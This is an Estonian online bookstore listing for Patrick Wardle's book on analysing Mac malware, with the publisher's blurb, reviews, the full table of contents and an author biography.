Muutke küpsiste eelistusi

Art of Mac Malware, Volume 1: The Guide to Analyzing Malicious Software [Pehme köide]

4.52/5 (62 hinnangut Goodreads-ist)
  • Formaat: Paperback / softback, 328 pages, kõrgus x laius: 235x178 mm
  • Ilmumisaeg: 12-Jul-2022
  • Kirjastus: No Starch Press,US
  • ISBN-10: 1718501943
  • ISBN-13: 9781718501942
Teised raamatud teemal:
Art of Mac Malware, Volume 1: The Guide to Analyzing Malicious SoftwareSuurem pilt
  • Formaat: Paperback / softback, 328 pages, kõrgus x laius: 235x178 mm
  • Ilmumisaeg: 12-Jul-2022
  • Kirjastus: No Starch Press,US
  • ISBN-10: 1718501943
  • ISBN-13: 9781718501942
Teised raamatud teemal:
Püsilink: https://www.kriso.ee/db/9781718501942.html
Märksõnad:
"The Art of Mac Malware is a comprehensive guide to the threats facing Apple computers and the foundational knowledge needed to become a proficient Mac malware analyst. Using real-world examples, the book surveys the malware's various infection methods and teaches static and dynamic analysis tools needed to examine malware you may find in the wild"--

A comprehensive guide to the threats facing Apple computers and the foundational knowledge needed to become a proficient Mac malware analyst.

Defenders must fully understand how malicious software works if they hope to stay ahead of the increasingly sophisticated threats facing Apple products today. The Art of Mac Malware: The Guide to Analyzing Malicious Software is a comprehensive handbook to cracking open these malicious programs and seeing what’s inside. 

Discover the secrets of nation state backdoors, destructive ransomware, and subversive cryptocurrency miners as you uncover their infection methods, persistence strategies, and insidious capabilities. Then work with and extend foundational reverse-engineering tools to extract and decrypt embedded strings, unpack protected Mach-O malware, and even reconstruct binary code. Next, using a debugger, you’ll execute the malware, instruction by instruction, to discover exactly how it operates. In the book’s final section, you’ll put these lessons into practice by analyzing a complex Mac malware specimen on your own.

You’ll learn to:



   Recognize common infections vectors, persistence mechanisms, and payloads leveraged by Mac malware
   Triage unknown samples in order to quickly classify them as benign or malicious
   Work with static analysis tools, including disassemblers, in order to study malicious scripts and compiled binaries
   Leverage dynamical analysis tools, such as monitoring tools and debuggers, to gain further insight into sophisticated threats
   Quickly identify and bypass anti-analysis techniques aimed at thwarting your analysis attempts

A former NSA hacker and current leader in the field of macOS threat analysis, Patrick Wardle uses real-world examples pulled from his original research. The Art of Mac Malware: The Guide to Analyzing Malicious Software is the definitive resource to battling these ever more prevalent and insidious Apple-focused threats.

Arvustused

"[ The Art of Mac Malware] serves as a valuable resource for anyone looking to level up their skills to stay on top of the latest macOS threats. Patrick's approachable, educating writing style and extensive knowledge in this field made him the ideal author to write this book." Maria Markstedter, @Fox0x01, Forbes Person Of The Year In Cybersecurity

"Mac doesnt face the same level of malware threat that Windows users experience. However, it is possible to create malware for macOS and the excellent book, The Art of Mac Malware, goes into a lot of detail." Security Boulevard

"Awesome job keeping readers hooked." Tony Lambert, @ForensicITGuy

"An awesome researcher writing for my favorite publisher . . . If youre interested in Mac malware, I highly recommend!" Francisco Donoso, @Francisckrs

Foreword xvii
Acknowledgments xix
Introduction xxi
Who Should Read This Book? xxiv
What You'll Find in This Book xxv
A Note on Mac Malware Terminology xxv
A Note on Safely Analyzing Malware xxv
Additional Resources xxvii
Books xxvii
Websites xxvii
Downloading This Book's Malware Specimens xxviii
Endnotes xxviii
PART I MAC MALWARE BASICS
1(66)
1 Infection Vectors
3(20)
Mac Protections
4(1)
Malicious Emails
5(1)
Fake Tech and Support
6(1)
Fake Updates
7(1)
Fake Applications
7(1)
Trojanized Applications
8(1)
Pirated and Cracked Applications
9(1)
Custom URL Schemes
10(4)
Office Macros
14(1)
Xcode Projects
15(1)
Supply Chain Attacks
16(1)
Account Compromises of Remote Services
17(1)
Exploits
18(1)
Physical Access
19(1)
Up Next
20(1)
Endnotes
20(3)
2 Persistence
23(24)
Login Items
24(2)
Launch Agents and Daemons
26(6)
Scheduled Jobs and Tasks
32(1)
Cron Jobs
32(1)
At Jobs
33(1)
Periodic Scripts
33(1)
Login and Logout Hooks
34(1)
Dynamic Libraries
34(1)
DYLD_* Environment Variables
35(1)
Dylib Proxying
36(1)
Dylib Hijacking
37(2)
Plug-ins
39(2)
Scripts
41(1)
Event Monitor Rules
41(1)
Reopened Applications
41(1)
Application and Binary Modifications
42(2)
KnockKnock ... Who's There?
44(1)
Up Next
44(1)
Endnotes
45(2)
3 Capabilities
47(20)
Categorizing Mac Malware Capabilities
47(1)
Survey and Reconnaissance
48(2)
Privilege Escalation
50(1)
Escaping Sandboxes
50(2)
Gaining Root Privileges
52(2)
Adware-Related Hijacks and Injections
54(2)
Cryptocurrency Miners
56(1)
Remote Shells
57(1)
Remote Process and Memory Execution
58(1)
Remote Download and Upload
59(2)
File Encryption
61(1)
Stealth
62(2)
Other Capabilities
64(1)
Up Next
65(1)
Endnotes
65(2)
PART II MAC MALWARE ANALYSIS
67(152)
4 Nonbinary Analysis
69(30)
Identifying File Types
70(2)
Extracting Malicious Files from Distribution Packaging
72(1)
Apple Disk Images (.dmg)
72(1)
Packages (.pkg)
73(3)
Analyzing Scripts
76(1)
Bash Shell Scripts
76(2)
Python Scripts
78(4)
AppleScript
82(6)
Perl Scripts
88(1)
Microsoft Office Documents
89(2)
Applications
91(4)
Up Next
95(1)
Endnotes
96(3)
5 Binary Triage
99(26)
The Mach-O File Format
99(1)
The Header
100(3)
The Load Commands
103(3)
The Data Segment
106(1)
Classifying Mach-O Files
107(1)
Hashes
107(2)
Code-Signing Information
109(3)
Strings
112(1)
Objective-C Class Information
113(1)
"Nonbinary" Binaries
114(1)
Identifying the Tool Used to Build the Binary
115(1)
Extracting the Nonbinary Component
116(6)
Up Next
122(1)
Endnotes
122(3)
6 Disassembly and Decompilation
125(24)
Assembly Language Basics
126(1)
Registers
126(1)
Assembly Instructions
127(1)
Calling Conventions
127(1)
The objc_msgSend Function
128(2)
Disassembly
130(1)
Objective-C Disassembly
130(3)
Swift Disassembly
133(2)
C/C++ Disassembly
135(2)
Control Flow Disassembly
137(2)
Decompilation
139(1)
Reverse Engineering with Hopper
140(1)
Creating a Binary to Analyze
140(1)
Loading the Binary
141(1)
Exploring the Interface
141(2)
Viewing the Disassembly
143(2)
Changing the Display Mode
145(1)
Up Next
146(1)
Endnotes
147(2)
7 Dynamic Analysis Tools
149(16)
Process Monitoring
150(1)
The ProcessMonitor Utility
151(2)
File Monitoring
153(1)
The fs_usage Utility
154(1)
The FileMonitor Utility
155(2)
Network Monitoring
157(1)
macOS's Network Status Monitors
158(1)
The Netiquette Utility
159(1)
Network Traffic Monitors
160(3)
Up Next
163(1)
Endnotes
163(2)
8 Debugging
165(22)
Why You Need a Debugger
166(1)
The LLDB Debugger
167(1)
Starting a Debugger Session
168(1)
Controlling Execution
169(1)
Using Breakpoints
170(4)
Examining All the Things
174(2)
Modifying Process State
176(2)
LLDB Scripting
178(2)
A Sample Debugging Session: Uncovering Hidden Cryptocurrency Mining Logic in an App Store Application
180(5)
Up Next
185(1)
Endnotes
185(2)
9 Anti-Analysis
187(32)
Anti-Static-Analysis Approaches
188(1)
Sensitive Strings Disguised as Constants
188(1)
Encrypted Strings
189(2)
Locating Obfuscated Strings
191(2)
Finding the Deobfuscation Code
193(1)
String Deobfuscation via a Hopper Script
194(3)
Forcing the Malware to Execute its Decryption Routine
197(3)
Code-Level Obfuscations
200(1)
Bypassing Packed Binary Code
201(2)
Decrypting Encrypted Binaries
203(1)
Anti-Dynamic-Analysis Approaches
204(1)
Checking the System Model Name
205(1)
Counting the System's Logical and Physical CPUs
206(1)
Checking the System's MAC Address
207(1)
Checking System Integrity Protection Status
208(1)
Detecting or Killing Specific Tools
208(1)
Detecting a Debugger
209(2)
Preventing Debugging with ptrace
211(1)
Bypassing Anti-Dynamic-Analysis Logic
212(1)
Modifying the Execution Environment
213(1)
Patching the Binary Image
213(2)
Modifying the Malware's Instruction Pointer
215(1)
Modifying a Register Value
216(1)
A Remaining Challenge: Environmentally Generated Keys
216(1)
Up Next
217(1)
Endnotes
217(2)
PART III ANALYZING EVILQUEST
219(62)
10 Evilquest's Infection, Triage, and Deobfuscation
221(22)
The Infection Vector
221(2)
Triage
223(1)
Confirming the File Type
223(1)
Extracting the Contents
224(1)
Exploring the Package
225(4)
Extracting Embedded Information from the patch Binary
229(2)
Analyzing the Command Line Parameters
231(1)
-silent
231(1)
-noroot
232(1)
-ignrp
233(1)
Analyzing AntiAnalysis Logic
233(1)
Virtual Machine-Thwarting Logic?
233(1)
Debugging-Thwarting Logic
234(4)
Obfuscated Strings
238(4)
Up Next
242(1)
Endnotes
242(1)
11 Evilquest's Persistence and Core Functionality Analysis
243(38)
Persistence
243(1)
Killing Unwanted Processes
244(2)
Making Copies of Itself
246(1)
Persisting the Copies as Launch Items
247(2)
Starting the Launch Items
249(3)
The Repersistence Logic
252(1)
The Local Viral Infection Logic
253(1)
Listing Candidate Files for Infection
254(1)
Checking Whether to Infect Each File
255(2)
Infecting Target Files
257(3)
Executing and Repersisting from Infected Files
260(2)
Executing the Infected File's Original Code
262(1)
The Remote Communications Logic
263(1)
The Mediator and Command and Control Servers
263(2)
Remote Tasking Logic
265(1)
react_exec (0×1)
266(2)
react_save (0×2)
268(1)
reacLstart (0×4)
268(1)
react_keys (0×8)
269(1)
reacLping (0×10)
270(1)
react_host (0×20)
270(1)
reacLscmd (0×40)
270(1)
The File Exfiltration Logic
271(1)
Directory Listing Exfiltration
271(1)
Certificate and Cryptocurrency File Exfiltration
272(3)
File Encryption Logic
275(2)
EvilQuest Updates
277(1)
Better Anti-Analysis Logic
278(1)
Modified Server Addresses
279(1)
A Longer List of Security Tools to Terminate
279(1)
New Persistence Paths
280(1)
A Personal Shoutout
280(1)
Better Functions
280(1)
Removed Ransomware Logic
281(1)
Conclusion 281(1)
Endnotes 282(1)
Index 283
Patrick Wardle is the creator of the Mac security website and tool suite Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware, and writing free open-source security tools to protect Mac users.